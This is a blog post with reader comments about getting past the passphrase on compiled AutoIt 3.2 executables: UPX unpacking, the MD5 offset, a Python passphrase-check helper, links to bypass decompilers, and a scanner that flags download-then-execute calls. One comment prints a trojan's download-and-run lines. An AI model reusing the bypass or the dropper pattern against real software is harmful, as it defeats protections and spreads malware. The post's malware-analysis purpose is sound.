UPDATE: New link for the file below: http://www.monkey-tech.com/files/AutoIt%203-Dec.zip
I’ve been hopelessly trying to figure out how to bypass the passphrase for AutoIt v3.2.0.1. One of our readers, Daniel, kindly posted a link to ANTIWPA (http://antiwpa.org.ru/), where they had already done this. I downloaded the “improved” decompiler and it worked great. Here’s a link to one of their mirrors (I couldn’t get to the original site):
Basically, they bypass the passphrase altogether. I managed to get to the point in OllyDbg (great tool, BTW; I’ll post some OllyDbg things I recently learned soon) where I found out that:
- The passphrase used for “encrypting” is stored in the file as an MD5 hash.
- The resulting .exe file is UPX-packed.
- To find the MD5, first use the upx.exe shipped with AutoIt (\autoit-v3.2.0.1\Aut2Exe\upx.exe) to decompress the .exe:
- Open a command prompt and run upx.exe with the “-d” switch:
- EXAMPLE: upx -d mytestfile.exe
- More about UPX can be found here: http://en.wikipedia.org/wiki/UPX
- This decompresses “mytestfile.exe”; it almost doubles in size.
- The MD5 hash of the passphrase is found at offset 0x0005d618 in the decompressed file (you can use hiew or any binary file viewer, even OllyDbg).
- When you run exe2aut to “decrypt” the file, it takes the passphrase you enter and converts it to an MD5 hash. There is also some XORing going on. This is where I’m weak right now.
- At some point it opens the EXE and does…something. This is where I was stuck.
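To make the two observations above concrete (the exe is UPX-packed, and after decompression the compile-time passphrase survives only as an unsalted 16-byte MD5 at 0x0005d618), here is a small Python helper I am adding to this post; it is not code from AutoIt, ANTIWPA or CW2K. It checks a byte buffer for the UPX section markers, reads the 16 bytes at the offset given above, and reproduces the check exe2aut is described as doing (MD5 the entered passphrase and compare). The sample “exe” it builds is a constructed stand-in, and the assumption that AutoIt 3.2 hashes the passphrase as a single-byte (ANSI) string is mine, not something this post establishes. The practical lesson is the one under “Why am I doing this?”: an unsalted MD5 of a passphrase is not protection for anything you put in the script.

```python
import hashlib

# Offset reported in this post for the MD5 of the passphrase in a
# UPX-decompressed AutoIt 3.2.0.1 executable.
PASSPHRASE_MD5_OFFSET = 0x0005D618
# Section names / signature UPX leaves in the PE header of a packed file.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def looks_upx_packed(data: bytes) -> bool:
    """Cheap heuristic: UPX markers inside the first 4 KiB of the file."""
    head = data[:0x1000]
    return any(marker in head for marker in UPX_MARKERS)


def stored_passphrase_md5(data: bytes, offset: int = PASSPHRASE_MD5_OFFSET) -> bytes:
    """Return the 16 raw bytes at the offset where the post found the MD5."""
    if len(data) < offset + 16:
        # A still-packed file is much shorter; remind the analyst to run upx -d first.
        raise ValueError("file too short for that offset; is it still UPX-packed?")
    return data[offset:offset + 16]


def passphrase_matches(data: bytes, candidate: str) -> bool:
    """The check exe2aut performs per the post: MD5 the entered text, compare.

    Encoding the candidate as latin-1 (single-byte ANSI) is an assumption
    made here for illustration.
    """
    digest = hashlib.md5(candidate.encode("latin-1")).digest()
    return digest == stored_passphrase_md5(data)


def build_sample(passphrase: str) -> bytes:
    """Constructed stand-in for a decompressed exe: MZ header, zero padding,
    and the passphrase MD5 planted at PASSPHRASE_MD5_OFFSET (not a real PE)."""
    buf = bytearray(b"MZ" + b"\x00" * (PASSPHRASE_MD5_OFFSET + 16 + 64))
    digest = hashlib.md5(passphrase.encode("latin-1")).digest()
    buf[PASSPHRASE_MD5_OFFSET:PASSPHRASE_MD5_OFFSET + 16] = digest
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample("s3cret")
    print("UPX packed:", looks_upx_packed(sample))
    print("stored MD5 :", stored_passphrase_md5(sample).hex())
    print("matches    :", passphrase_matches(sample, "s3cret"))
```

To use it on a real file, read it with open(path, "rb").read(), run looks_upx_packed first and, if it is packed, decompress with upx -d before calling stored_passphrase_md5; the offset is the one this post found for 3.2.0.1 builds and may not hold for other versions.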
I’ll examine the AutoIt3-Decompiler from CW2K to see if I can learn anything from them. If anyone has info on how they did it, please post a comment. From what I can see, it seems like they just “patched” the original AutoIt decompiler, probably to skip the whole passphrase check or to fill in the MD5 of the passphrase from the one stored in the file.
Why am I doing this? Why do I care? Two reasons:
- To emphasise that people should NOT store passwords or sensitive information in their AutoIt scripts.
- To quote from the readme file in the “improved” decompiler above:
“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“
That’s right. Lots of these so-called AutoIt trojans are being spread among our community. Using the above tool, I was able to decompile them all to see how they affected my system.
Thanks very much for your great posts. Keep up your good work!
The zip file is not on that url, can you please upload it somewhere?
Nowadays AutoIt scripts can be obfuscated. So even if you can decompile, you will not be able to read the code you just decompiled.
http://www.autoitscript.com/forum/index.php?showtopic=32171&pid=231190&st=0&#
this site may help you then… http://www.openrce.org/forums/posts/178
Here is a working mirror for the “Improved” version:
“http://t-line.net.ua/antiwpa/Other/tmp/”.
Enjoy!
It doesn’t seem to work for me anymore on newly made scripts -.-‘
Has anyone shed any new light on this subject? I have an AutoIt 3.2.2.0 exe file that I have been trying to get the original script from. I have tried the tutorial at OpenRCE and it does not seem to work.
TIA
I completely reverse engineered the official AutoIt3 decompiler and made it
open source. See
->myAutToExe1_51_src.zip
http://nfo.host.sk/antiwpa/Other/tmp/
* It can also decompile ‘Auto Hot Key’ scripts (AHK is a spin-off project from AutoIt).
I also added ‘support’ for some common obfuscators like ‘van Zande’ (the one from the AutoIt download page) and Encode it.
For historical reasons, and for people from the East (China, Japan…) who have DBCS (Double Binary Char Set) enabled on their Windows, which myAutToExe currently doesn’t get along with, there is also the ‘Exe2Aut-CW2K-Edition2.exe’, which now also supports Unicode scripts.
->AutoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip
http://nfo.host.sk/antiwpa/Other/tmp/
Related forum link:
http://maghia.free.fr/Board/viewtopic.php?t=234
Does anyone have AutoIt 3-Decompiler CW2K-Edition2 + Improved Version.zip? The site is dead and I cannot download it.
Another mirror site?
Best regards
AutoIt 3.2.6.0 and higher compiles to bytecode. Makes checking scripts for backdoors harder… 😦
Will anyone care to write a decompiler?
Thanks for the info guys. I got an AutoIt program that I really needed but it had a trojan; with the decompiler I got from one of the URLs I could remove the trojan from the script and rebuild it =D
Look what was in the script:
InetGet("http://www.xxxxxxx/hosts.exe", "C:\WINDOWS\hosts.exe", 1)
Sleep(40000)
ShellExecute("hosts.exe", "C:\WINDOWS\")
I removed that and rebuilt the script and now I’m happy =D
thanks again
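The three lines the commenter above pulled out of the decompiled script (download to the Windows directory, sleep, execute) are a pattern worth checking for automatically once you have a decompiled .au3 in hand. The following Python scanner is an added example, not code from the commenter or from any of the decompilers linked here. It walks the lines of a script, pulls out download and execution calls with their string arguments, and flags the download-then-execute ordering and writes under C:\WINDOWS\. The sample script is constructed to resemble the snippet above (with a non-routable placeholder host); the list of function names to watch is my own choice and covers more than the two calls in the comment (Run/RunWait and InetRead, which AutoIt also provides).

```python
import re

# Constructed sample of a decompiled AutoIt script, modelled on the
# snippet in the comment above. The host is a placeholder, not a real URL.
SAMPLE_SCRIPT = """\
; installer script (constructed sample)
$title = "Helper"
InetGet("http://example.invalid/hosts.exe", "C:\\WINDOWS\\hosts.exe", 1)
Sleep(40000)
ShellExecute("hosts.exe", "C:\\WINDOWS\\")
MsgBox(0, $title, "done")
"""

# Calls that fetch content from the network, and calls that start a program.
DOWNLOAD_CALLS = {"InetGet", "InetRead"}
EXEC_CALLS = {"ShellExecute", "ShellExecuteWait", "Run", "RunWait"}
CALL_RE = re.compile(r"\b(InetGet|InetRead|ShellExecute|ShellExecuteWait|Run|RunWait)\s*\(")
# AutoIt string literals use either double or single quotes.
STRING_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'')


def find_suspicious_calls(script: str) -> list:
    """Return one record per line that calls a watched function.

    Each record carries the line number, the function name and the string
    arguments found on that line. AutoIt comment lines (';') are skipped.
    """
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if line.lstrip().startswith(";"):
            continue
        match = CALL_RE.search(line)
        if not match:
            continue
        args = [dq or sq for dq, sq in STRING_RE.findall(line)]
        findings.append({"line": lineno, "func": match.group(1), "args": args})
    return findings


def is_download_and_execute(findings: list) -> bool:
    """True when some execute call appears after the first download call."""
    first_dl = next((f["line"] for f in findings if f["func"] in DOWNLOAD_CALLS), None)
    if first_dl is None:
        return False
    return any(f["func"] in EXEC_CALLS and f["line"] > first_dl for f in findings)


def paths_under_windows_dir(findings: list) -> list:
    """String arguments that point into C:\\WINDOWS\\ (case-insensitive)."""
    return [a for f in findings for a in f["args"]
            if a.lower().startswith("c:\\windows\\")]


if __name__ == "__main__":
    found = find_suspicious_calls(SAMPLE_SCRIPT)
    for f in found:
        print(f"line {f['line']}: {f['func']}{tuple(f['args'])}")
    print("download-then-execute:", is_download_and_execute(found))
    print("writes under C:\\WINDOWS\\:", paths_under_windows_dir(found))
```

The ordering check is deliberately loose (any execute call after the first download, regardless of how many Sleep calls sit between them), since the long Sleep in the comment’s snippet is exactly the sort of thing that would defeat a check looking for adjacent lines.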
Hello,
thank you for the great information.
I have one AutoIt decompiler (along with some latest version of AutoIt3 I downloaded).
Just got interested in AutoIt after I decompiled a nasty Trojan.. 🙂
The links that you have mentioned here are no longer available; I need some decompiler that “bypasses the passphrase”… please help me.
Got to decompile a few more Trojans.. 😉
Hey, if you guys come across any AutoIt-written viruses, split them into a lot of pieces (use a simple splitter), zip all the files and mail them to me at mario_thilanga@yahoo.com. I think I will then try my best to program a cure for those viruses and mail it to whoever you are. Try me, maybe you’ll find it helps. Don’t worry, I’m not a spammer, I just want to help!!!
But remember it will take a little bit of time 🙂
I got this bot that has a password on it – does anyone have a current way to break the encryption and decompile an exe?
All the old links are dead.. Please help 🙂
Hi… how can I debug an AutoIt file using OllyDbg?